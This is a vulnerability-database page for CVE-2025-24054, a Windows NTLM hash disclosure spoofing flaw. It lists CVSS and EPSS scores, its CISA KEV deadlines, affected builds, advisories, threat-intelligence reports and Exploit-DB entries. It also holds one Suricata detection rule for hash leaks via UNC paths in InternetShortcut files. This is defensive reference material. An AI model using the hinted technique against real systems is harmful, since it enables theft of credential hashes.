⚠ Actively exploited
Added to CISA KEV on 2025-04-17. Federal agencies required to patch by 2025-05-08. Required action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable..

CVE-2025-24054External Control of File Name or Path in Microsoft Windows 10 Version 1507

CWE-73External Control of File Name or Path19 documents11 sources
Severity
5.4MEDIUMNVD
CNA6.5VulnCheck6.5
EPSS
11.9%
top 6.23%
CISA KEV
KEV
Added 2025-04-17
Due 2025-05-08
Exploit
PoC available
Public exploit / PoC exists
Affected products
26
Microsoft Windows 10 Version 1507Microsoft Windows 10 Version 1607Microsoft Windows 10 Version 1809+23 more
Timeline
PublishedMar 11
KEV addedApr 17
KEV dueMay 8
Latest updateFeb 11
CISA Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Description

External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:NExploitability: 2.8 | Impact: 2.5

Affected Packages25 packages

NVDmicrosoft/windows< 10.0.14393.7876+5
NVDmicrosoft/windows_10_1507< 10.0.10240.20947
NVDmicrosoft/windows_10_1607< 10.0.14393.7876
NVDmicrosoft/windows_10_1809< 10.0.17763.7009
NVDmicrosoft/windows_10_21h2< 10.0.19044.5608

🔴Vulnerability Details

4
CVEList
NTLM Hash Disclosure Spoofing Vulnerability2025-03-11
GHSA
GHSA-6v67-599p-fprc: External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network2025-03-11
VulnCheck
Microsoft Windows NTLM Hash Disclosure Spoofing Vulnerability2025
VulnCheck
Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability2024

💥Exploits & PoCs

4
Exploit-DB
Windows 10.0.17763.7009 - spoofing vulnerability2026-02-11
Exploit-DB
windows 10/11 - NTLM Hash Disclosure Spoofing2026-02-04
Exploit-DB
Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure2025-08-18
Exploit-DB
Microsoft - NTLM Hash Disclosure Spoofing (library-ms)2025-05-01

🔍Detection Rules

1
Suricata
ET EXPLOIT NTLM Hash Disclosure via InternetShortcut File Inbound with UNC Path Inbound (CVE-2024-43451)2025-05-13

📋Vendor Advisories

2
CISA
Microsoft Windows NTLM Hash Disclosure Spoofing Vulnerability2025-04-17
Microsoft
NTLM Hash Disclosure Spoofing Vulnerability2025-03-11

🕵️Threat Intelligence

7
Securelist
Old tech, new vulnerabilities: NTLM abuse, ongoing exploitation in 20252025-11-26
Securelist
How NTLM is being abused in 2025 cyberattacks2025-11-26
Bleepingcomputer
Microsoft Outlook to block more risky attachments used in attacks2025-06-10
Bleepingcomputer
Windows NTLM hash leak flaw exploited in phishing attacks on governments2025-04-17
Qualys
Microsoft and Adobe Patch Tuesday, March 2025 Security Update Review2025-03-11
CVE-2025-24054 — External Control of File Name or Path | cvebase